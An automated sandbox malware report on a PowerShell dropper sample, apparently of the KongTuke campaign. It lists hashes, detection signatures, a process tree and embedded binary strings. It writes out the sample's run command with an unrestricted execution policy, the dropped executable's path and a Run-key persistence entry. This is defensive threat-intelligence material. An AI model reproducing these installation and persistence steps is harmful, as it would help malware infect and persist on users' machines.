Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
download.ps1

Overview

General Information

Sample name:download.ps1
Analysis ID:1571746
MD5:828e0cc3c14385d28606aca4c5edf657
SHA1:bc962c5c0d31e0e0c13c0c3505a53ec3d3251a25
SHA256:aef32c3cd1cd6bd44239ca9a75064cfa31fc0d582e33683c1c602559b7e107f8
Tags:KongTukeps1user-monitorsg
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected suspicious sample
Contains functionality to infect the boot sector
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Opens network shares
Powershell drops PE file
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Binary contains a suspicious time stamp
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to enumerate running services
Contains functionality to query CPU information (cpuid)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Classification

  • System is w10x64
  • powershell.exe (PID: 1872 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 1928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • check.exe (PID: 3276 cmdline: "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe" MD5: F17797CAAB0F1CB8D5813853AAD786CA)
      • check.exe (PID: 3120 cmdline: "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe" MD5: F17797CAAB0F1CB8D5813853AAD786CA)
        • systeminfo.exe (PID: 3976 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
          • conhost.exe (PID: 4052 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 6712 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3576 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 3020 cmdline: wmic computersystem get manufacturer MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
        • WerFault.exe (PID: 4100 cmdline: C:\Windows\system32\WerFault.exe -u -p 3120 -s 968 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • check.exe (PID: 5596 cmdline: "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe" MD5: F17797CAAB0F1CB8D5813853AAD786CA)
    • check.exe (PID: 7100 cmdline: "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe" MD5: F17797CAAB0F1CB8D5813853AAD786CA)
      • systeminfo.exe (PID: 3724 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
        • conhost.exe (PID: 7076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6636 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 3976 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 5672 cmdline: wmic computersystem get manufacturer MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • WerFault.exe (PID: 2952 cmdline: C:\Windows\system32\WerFault.exe -u -p 7100 -s 968 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • check.exe (PID: 4128 cmdline: "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe" MD5: F17797CAAB0F1CB8D5813853AAD786CA)
    • check.exe (PID: 5536 cmdline: "C:\Users\user\AppData\Roaming\kbHYWyel\check.exe" MD5: F17797CAAB0F1CB8D5813853AAD786CA)
      • systeminfo.exe (PID: 6016 cmdline: systeminfo MD5: EE309A9C61511E907D87B10EF226FDCD)
        • conhost.exe (PID: 4360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2856 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get manufacturer" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 2044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WMIC.exe (PID: 6764 cmdline: wmic computersystem get manufacturer MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • WerFault.exe (PID: 7024 cmdline: C:\Windows\system32\WerFault.exe -u -p 5536 -s 1012 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 1872, ProcessName: powershell.exe
Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1872, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NetUtilityApp
Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1872, TargetFilename: C:\Users\user\AppData\Roaming\kbHYWyel\check.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1", ProcessId: 1872, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.0% probability
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qtiff.pdbBB source: check.exe, 00000004.00000003.1793111375.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\platformthemes\qxdgdesktopportal.pdb source: check.exe, 00000004.00000003.1796755966.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtsvg\plugins\iconengines\qsvgicon.pdb source: check.exe, 00000004.00000003.1791390585.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtsvg\plugins\imageformats\qsvg.pdb source: check.exe, 00000004.00000003.1792660148.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: check.exe, 00000005.00000002.2170173659.00007FFBA0E47000.00000002.00000001.01000000.00000020.sdmp
Source: Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\msvcp140_1.amd64.pdb source: check.exe, 00000004.00000003.1764181541.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2202836446.00007FFBBC703000.00000002.00000001.01000000.00000014.sdmp
Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: check.exe, 00000005.00000002.2172607096.00007FFBA129A000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\generic\qtuiotouchplugin.pdb source: check.exe, 00000004.00000003.1790762590.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: check.exe, 00000005.00000002.2183774332.00007FFBA9895000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\msvcp140.amd64.pdb source: check.exe, 00000005.00000002.2184592817.00007FFBA9935000.00000002.00000001.01000000.00000013.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Core.pdb source: check.exe, 00000005.00000002.2175053692.00007FFBA17D6000.00000002.00000001.01000000.00000012.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qtiff.pdb source: check.exe, 00000004.00000003.1793111375.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\imageformats\qico.pdb source: check.exe, 00000004.00000003.1792161641.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\imageformats\qgif.pdb source: check.exe, 00000004.00000003.1791790057.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/*0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_p
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qtga.pdb source: check.exe, 00000004.00000003.1792836734.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG" source: check.exe, 00000005.00000002.2172607096.00007FFBA1202000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: check.exe, 00000005.00000002.2194580325.00007FFBB5CD4000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: check.exe, 00000005.00000002.2194580325.00007FFBB5CD4000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: D:\a\1\b\libcrypto-3.pdb source: check.exe, 00000005.00000002.2172607096.00007FFBA129A000.00000002.00000001.01000000.0000001A.sdmp
Source: Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdb source: check.exe, 00000004.00000003.1779981685.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000005.00000002.2201831662.00007FFBBC155000.00000002.00000001.01000000.00000015.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qicns.pdb source: check.exe, 00000004.00000003.1791996032.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\select.pdb source: check.exe, 00000005.00000002.2200750849.00007FFBBBE93000.00000002.00000001.01000000.00000018.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\styles\qwindowsvistastyle.pdb%% source: check.exe, 00000005.00000002.2203368658.00007FFBC1A27000.00000002.00000001.01000000.00000027.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\styles\qwindowsvistastyle.pdb source: check.exe, 00000005.00000002.2203368658.00007FFBC1A27000.00000002.00000001.01000000.00000027.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: check.exe, 00000005.00000002.2188337968.00007FFBB1893000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: check.exe, 00000005.00000002.2200254820.00007FFBBB746000.00000002.00000001.01000000.0000001C.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\imageformats\qico.pdb source: check.exe, 00000004.00000003.1792161641.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\generic\qtuiotouchplugin.pdb source: check.exe, 00000004.00000003.1790762590.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Core.pdbT source: check.exe, 00000005.00000002.2175053692.00007FFBA17D6000.00000002.00000001.01000000.00000012.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Gui.pdb source: check.exe, 00000005.00000002.2159776261.00007FFBA009A000.00000002.00000001.01000000.00000024.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: check.exe, 00000005.00000002.2191613703.00007FFBB5C1D000.00000002.00000001.01000000.0000000F.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\Qt5Widgets.pdb source: check.exe, 00000005.00000002.2163791427.00007FFBA069A000.00000002.00000001.01000000.00000023.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\plugins\platforms\qwindows.pdb source: check.exe, 00000005.00000002.2203785112.00007FFBC1B34000.00000002.00000001.01000000.00000026.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: check.exe, 00000005.00000002.2189414783.00007FFBB4C49000.00000002.00000001.01000000.00000017.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtimageformats\plugins\imageformats\qwbmp.pdb source: check.exe, 00000004.00000003.1793540459.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\qt\work\qt\qtbase\lib\libEGL.pdb source: check.exe, 00000004.00000003.1781913135.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\python313.pdb source: check.exe, 00000005.00000002.2179207812.00007FFBA1FA8000.00000002.00000001.01000000.0000000A.sdmp
Source: Binary string: D:\a\1\b\libssl-3.pdb source: check.exe, 00000005.00000002.2183774332.00007FFBA9895000.00000002.00000001.01000000.0000001B.sdmp
Source: Binary string: d:\agent\_work\1\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: check.exe, 00000004.00000003.1779557070.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: check.exe, 00000005.00000002.2185925889.00007FFBAB9BE000.00000002.00000001.01000000.00000019.sdmp
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E8E83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,4_2_00007FF61E8E83C0
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E8E9280 FindFirstFileExW,FindClose,4_2_00007FF61E8E9280
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 4_2_00007FF61E901874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,4_2_00007FF61E901874
Source: C:\Users\user\AppData\Roaming\kbHYWyel\check.exeCode function: 16_2_00007FFB9DD62E70 memset,PyList_New,SetErrorMode,PyArg_ParseTuple,PyObject_IsTrue,PyEval_SaveThread,GetLogicalDriveStringsA,PyEval_RestoreThread,PyErr_SetFromWindowsErr,SetErrorMode,PyEval_SaveThread,GetDriveTypeA,PyEval_RestoreThread,GetVolumeInformationA,strcat_s,SetLastError,strcat_s,strcat_s,strcat_s,FindFirstVolumeMountPointA,strcpy_s,strcat_s,Py_BuildValue,PyList_Append,_Py_Dealloc,FindNextVolumeMountPointA,FindVolumeMountPointClose,strcat_s,strcat_s,Py_BuildValue,PyList_Append,_Py_Dealloc,strchr,SetErrorMode,FindVolumeMountPointClose,SetErrorMode,_Py_Dealloc,_Py_Dealloc,16_2_00007FFB9DD62E70
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficDNS traffic detected: DNS query: nodejs.org
Source: check.exe, 00000005.00000002.2120330998.000001DB08470000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://.../back.jpeg
Source: check.exe, 00000004.00000003.2208485892.0000028311F00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digi
Source: check.exe, 00000004.00000003.1781913135.0000028311EF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredID
Source: check.exe, 00000004.00000003.1791790057.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1782384154.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1790762590.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1775657860.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1781913135.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1773967823.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1791996032.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1769611350.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1793540459.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1795572179.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1771878614.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1793731600.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1793111375.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1796755966.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1781913135.0000028311F00000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1773756678.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1794748635.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1792836734.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1792394071.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1772457006.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1764868786.0000028311EF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: check.exe, 00000004.00000003.1791790057.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1782384154.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1790762590.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1775657860.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1781913135.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1773967823.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1791996032.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1769611350.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1793540459.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1795572179.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1771878614.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1793731600.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1793111375.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1796755966.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1781913135.0000028311F00000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1773756678.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1794748635.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1792836734.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1792394071.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1772457006.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1764868786.0000028311EF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: check.exe, 00000004.00000003.1791790057.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1782384154.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1790762590.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1775657860.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1781913135.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1773967823.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1791996032.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1769611350.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1793540459.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1795572179.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1771878614.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1793731600.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1793111375.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1796755966.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1773756678.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1794748635.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1792836734.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1792394071.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1772457006.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1764868786.0000028311EF3000.00000004.00000020.00020000.00000000.sdmp, check.exe, 00000004.00000003.1791390585.0000028311EF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
